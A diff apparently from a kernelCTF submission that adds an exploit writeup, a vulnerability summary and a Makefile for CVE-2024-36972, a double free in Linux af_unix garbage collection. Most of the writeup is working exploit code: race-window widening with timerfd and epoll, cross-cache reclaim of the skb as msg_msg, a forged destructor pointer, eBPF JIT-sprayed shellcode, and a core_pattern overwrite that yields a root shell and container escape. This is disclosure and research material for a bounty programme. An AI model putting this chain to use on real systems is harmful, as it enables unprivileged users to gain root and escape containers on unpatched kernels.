google
diff --git a/‎pocs/linux/kernelctf/CVE-2024-36972_lts_cos/docs/exploit.md
+270 b/‎pocs/linux/kernelctf/CVE-2024-36972_lts_cos/docs/exploit.md
+270
diff --git a/‎pocs/linux/kernelctf/CVE-2024-36972_lts_cos/docs/vulnerability.md
+15 b/‎pocs/linux/kernelctf/CVE-2024-36972_lts_cos/docs/vulnerability.md
+15
diff --git a/‎pocs/linux/kernelctf/CVE-2024-36972_lts_cos/exploit/cos-109-17800.218.20/Makefile
+11 b/‎pocs/linux/kernelctf/CVE-2024-36972_lts_cos/exploit/cos-109-17800.218.20/Makefile
+11
diff --git a/‎pocs/linux/kernelctf/CVE-2024-36972_lts_cos/exploit/cos-109-17800.218.20/exploit
935 KB b/‎pocs/linux/kernelctf/CVE-2024-36972_lts_cos/exploit/cos-109-17800.218.20/exploit
935 KB
@@ -0,0 +1,270 @@
+# Vulnerability
+unix_gc() garbage-collects inflight sockets; if a candidate socket has an MSG_OOB skb stored in unix_sk(sk)->oob_skb, the GC drops that reference without holding any lock.  
+This creates a race condition between unix_gc [1] and a concurrent queue_oob [2] call made by the peer unix socket.
+
+* unix_gc
+```c
+	skb_queue_head_init(&hitlist);
+	list_for_each_entry(u, &gc_candidates, link) {
+		scan_children(&u->sk, inc_inflight, &hitlist);
+
+#if IS_ENABLED(CONFIG_AF_UNIX_OOB)
+		if (u->oob_skb) {
+			kfree_skb(u->oob_skb); //[1]
+			u->oob_skb = NULL;
+		}
+#endif
+	}
+
+```
+
+* queue_oob
+```c
+	if (ousk->oob_skb)
+		consume_skb(ousk->oob_skb); //[2]
+
+	WRITE_ONCE(ousk->oob_skb, skb);
+```
+
+
+
+# Exploit Tech Detail
+The exploit consists of the following steps:
+* Prepare timerfd to extend race window
+* Prepare refcount circle to make unix_gc free victim unix_socket
+* Race between unix_gc with queue_oob
+* Reclaim SKB with msg_msg to control destructor
+* Call kfree_skb to RIP Control
+* Achieve container escape.
+
+## Prepare timerfd to extend race window
+We adopt the technique from Jann's blog post `Racing against the clock -- hitting a tiny kernel race window` to extend the race window.
+To make the race window larger on kernels without CONFIG_PREEMPT, we:
+* make a timerfd expire in that window (which will run in an interrupt handler - in other words, in hardirq context)
+* make sure that the wakeup triggered by the timerfd has to churn through many waitqueue items created by epoll
+
+The function `do_epoll_enqueue` in our exploit code does exactly this:
+```C
+void do_epoll_enqueue(int fd)
+{
+	int cfd[2];
+	socketpair(AF_UNIX, SOCK_STREAM, 0, cfd);
+	for (int k = 0; k < 0x4; k++)
+	{
+		if (fork() == 0)
+		{
+			for (int i = 0; i < 0x100; i++)
+			{
+				timefds[i] = SYSCHK(dup(fd));
+			}
+			for (int i = 0; i < 0xc0; i++)
+			{
+				epfds[i] = SYSCHK(epoll_create(0x1));
+			}
+			for (int i = 0; i < 0xc0; i++)
+			{
+				for (int j = 0; j < 0x100; j++)
+				{
+					// queue as many as possible async waiters at timerfd waitqueue
+					epoll_ctl_add(epfds[i], timefds[j], 0);
+				}
+			}
+			write(cfd[1], buf, 1);
+			raise(SIGSTOP); // stop here for nothing and just keep epoll alive
+		}
+		// sync to make sure it has queue what we need
+		read(cfd[0], buf, 1);
+	}
+	close(cfd[0]);
+	close(cfd[1]);
+}
+```
+
+## Race between unix_gc with queue_oob
+
+The refcount of an sk_buff is stored in its `users` field. Calling kfree_skb on an sk_buff whose users == 1 frees it.  
+A unix socket's oob_skb holds two references: one for the pointer stored in unix_sock->oob_skb and another for its entry in sock->sk_receive_queue.
+We use two threads to trigger the race between unix_gc and queue_oob under the following interleaving.
+
+Thread A                 		      | Thread B
+----------------------------|------------------------------
+queue_oob() // users == 2 <br> consume_skb() // users == 2 -> 1 | unix_gc()
+<br> | if (u->oob_skb)  // users == 1 <br> kfree_skb(u->oob_skb) // free skb
+WRITE_ONCE(ousk->oob_skb, skb) | 
+<br> | unix_release_sock() <br> skb = skb_dequeue(&sk->sk_receive_queue) <br> kfree_skb(skb); // skb UAF
+
+## Reclaim SKB with msg_msg to control destructor
+
+sk_buff is under `skbuff_head_cache` with size `0xe0`
+```
+gef➤  p sizeof(struct sk_buff)
+$1 = 0xe0
+```
+Using a cross-cache technique, we can reclaim the victim skb as a msg_msg, which lives in the `kmalloc-cg-256` cache, as shown in the following example code.
+
+* Allocate many skbs before and after the victim
+```c
+		// Allocate some sk_buff before oob_skb
+		for (int i = 0; i < 0x200; i++)
+			SYSCHK(send(datafd[1], buf, 1, 0));
+
+		SYSCHK(send(victim_fd[1], buf, 1, MSG_OOB));
+
+		// Allocate some sk_buff after oob_skb
+		for (int i = 0; i < 0x200; i++)
+			SYSCHK(send(datafd[0], buf, 1, 0));
+
+```
+
+* Free them all and reclaim as msg_msg
+```c
+		// free all skbs
+		for (int i = 0; i < 0x200; i++)
+			SYSCHK(recv(datafd[0], buf, 1, 0));
+
+		// free all skbs
+		for (int i = 0; i < 0x200; i++)
+			SYSCHK(recv(datafd[1], buf, 1, 0));
+
+		// cross-cache to reclaim oob_skb as msg_msg
+		for (int i = 0; i < 0x1000; i++)
+			SYSCHK(msgsnd(msqid[i], &msg, 0x100 - 0x30, 0));
+```
+
+* Forge the skb so that users equals one and destructor holds the address we want to jump to
+
+```c
+	char *skb = (void *)&msg.mtext[-0x30];
+
+	// struct sk_buff {
+	//     void       (*destructor)(struct sk_buff *); /*    96     8 */
+	//     refcount_t                 users;                /*   220     4 */
+#define OFFSET_SKB_DESTRUCTOR 96
+#define OFFSET_SKB_USERS 220
+	*(size_t *)(skb + OFFSET_SKB_DESTRUCTOR) = 0xffffffffcc000000 - 0x800;
+	*(unsigned *)(skb + OFFSET_SKB_USERS) = 1;
+```
+
+## RIP Control
+We set `skb->destructor` to a guessed eBPF JIT address. When the forged skb is freed, `skb_release_head_state` calls that pointer:
+
+```c
+void skb_release_head_state(struct sk_buff *skb)
+{
+	skb_dst_drop(skb);
+	if (skb->destructor) {
+		DEBUG_NET_WARN_ON_ONCE(in_hardirq());
+		skb->destructor(skb);
+	}
+```
+
+
+## Achieve container escape
+### Spray eBPF programs
+Our goal is to do some eBPF JIT spraying so later when we control kernel RIP, it will jump to the JIT page and execute our shellcode.
+
+The Linux kernel provides the socket option `SO_ATTACH_FILTER`, which lets a user attach a classic BPF program to a socket for use as a filter of incoming packets.
+
+By creating many sockets and attaching a classic BPF program to each of them, we can spray a lot of eBPF programs in the kernel.
+```cpp
+    struct sock_fprog prog = {
+        .len =  TSIZE,
+        .filter = filter,
+    };
+    for(int i=0;i<NUM;i++){
+        int fd[2];
+        SYSCHK(socketpair(AF_UNIX,SOCK_DGRAM,0,fd));
+        SYSCHK(setsockopt(fd[0],SOL_SOCKET,26,&prog,sizeof(prog)));
+    }
+```
+
+As for the shellcode in our eBPF program, our goal is to overwrite  `/proc/sys/kernel/core_pattern` so later we can execute command as root by triggering crash. Here's what our shellcode did to achieve our goal:
+* Use the `rdmsr` instruction to obtain the kernel text address. With RCX being set to MSR_LSTAR ( `0xc0000082` ), we'll be able to obtain the address of `entry_SYSCALL_64`.
+* Calculate the address of `core_pattern` and `_copy_from_user`.
+* Call `_copy_from_user(core_pattern, user_buf, 0x30);`, where `user_buf` is a buffer in user space that stores the content we want to overwrite in `core_pattern`. 
+
+We construct our eBPF program with the following form:
+
+```cpp
+struct sock_filter table[] = {
+        {.code = BPF_LD + BPF_K, .k = 0xb3909090},
+        {.code = BPF_LD + BPF_K, .k = 0xb3909090},
+        .....................
+};
+```
+
+The above example will be compiled into the following instructions after JIT:
+
+```
+b8 90 90 90 b3    mov eax, 0xb3909090
+b8 90 90 90 b3    mov eax, 0xb3909090
+```
+
+If we can control kernel RIP to jump into the NOP instruction ( 0x90 ), the code will become:
+
+```
+90       nop 
+b3 b8    mov    bl, 0xb8
+90       nop
+90       nop
+90       nop
+b3 b8    mov    bl, 0xb8
+....
+```
+
+We can see that by using an extra byte `0xb3`, we can skip the useless byte `0xb8` and execute our own shellcode. Notice that due to the "skipping part", we only have 3 bytes of space in each instruction, so we'll have to take care of that as well during our shellcode construction.
+
+### Post RIP
+
+Once we control the kernel RIP and jump into the middle of our eBPF program, the shellcode we crafted overwrites core_pattern with `|/proc/%P/fd/666 %P`.
+
+We then create a memfd, write an executable payload into it, and duplicate it to fd 666.
+```C
+int check_core()
+{
+	// Check if /proc/sys/kernel/core_pattern has been overwritten
+	char buf[0x100] = {};
+	int core = open("/proc/sys/kernel/core_pattern", O_RDONLY);
+	read(core, buf, sizeof(buf));
+	close(core);
+	return strncmp(buf, "|/proc/%P/fd/666", 0x10) == 0;
+}
+void crash(char *cmd)
+{
+	int memfd = memfd_create("", 0);
+	SYSCHK(sendfile(memfd, open("/proc/self/exe", 0), 0, 0xffffffff));
+	dup2(memfd, 666);
+	close(memfd);
+	while (check_core() == 0)
+		sleep(1);
+	puts("Root shell !!");
+	/* Trigger program crash and cause kernel to executes program from core_pattern which is our "root" binary */
+	*(size_t *)0 = 0;
+}
+```
+
+Later, when a coredump happens, the kernel executes our executable file as root in the root namespace:
+```C
+*(size_t*)0=0; //trigger coredump
+```
+
+We spawn a shell when the coredump happens. The code looks like this:
+```c++
+int main(int argc, char **argv)
+{
+        if (argc > 1)
+        {
+			// #define SYS_pidfd_getfd 438
+			int pid = strtoull(argv[1], 0, 10);
+			int pfd = syscall(SYS_pidfd_open, pid, 0);
+			int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0);
+			int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0);
+			int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0);
+			dup2(stdinfd, 0);
+			dup2(stdoutfd, 1);
+			dup2(stderrfd, 2);
+			/* Get flag and poweroff immediately to boost next round try in PR verification workflow*/
+			system("cat /flag;echo o>/proc/sysrq-trigger");
+			execlp("bash", "bash", NULL);
+		}
+```
@@ -0,0 +1,15 @@
+- Requirements:
+    - Capabilites: None
+    - Kernel configuration: CONFIG_AF_UNIX_OOB
+    - User namespaces required: No
+- Introduced by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=1279f9d9dec2d7462823a18c29ad61359e0a007d
+- Fixed by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=9841991a446c87f90f66f4b9fee6fe934c1336a2
+- Affected kernel versions: v6.8 - v6.9, v5.15.147, v6.1.78, v6.6.17
+- Affected component: af_unix
+- Syscall to disable: socket
+- URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-36972
+- Cause: Double Free
+- Description: A double free vulnerability in the Linux kernel's af_unix. __unix_gc() tries to garbage-collect close()d inflight sockets,
+and then if the socket has MSG_OOB in unix_sk(sk)->oob_skb, GC will drop the reference and set it to NULL locklessly.
+However, the peer socket can still send MSG_OOB messages and queue_oob() can update unix_sk(sk)->oob_skb concurrently, leading to a double free.
+We recommend upgrading past commit 9841991a446c87f90f66f4b9fee6fe934c1336a2
@@ -0,0 +1,11 @@
+# Build and deploy the exploit binary for this target.
+# None of these targets name a file they produce, so mark them phony.
+.PHONY: all install clean
+
+all: exploit
+
+exploit: poc.c sc.h
+	gcc poc.c -o exploit -static -pthread
+
+# Copy the built binary (named "exploit", see the rule above) to the VM and run it.
+install: exploit
+	scp exploit vm:
+	ssh vm ./exploit
+
+# Remove only the build output. sc.h is a prerequisite of "exploit" and this
+# Makefile has no rule to regenerate it, so it must not be deleted here.
+clean:
+	rm -f exploit
+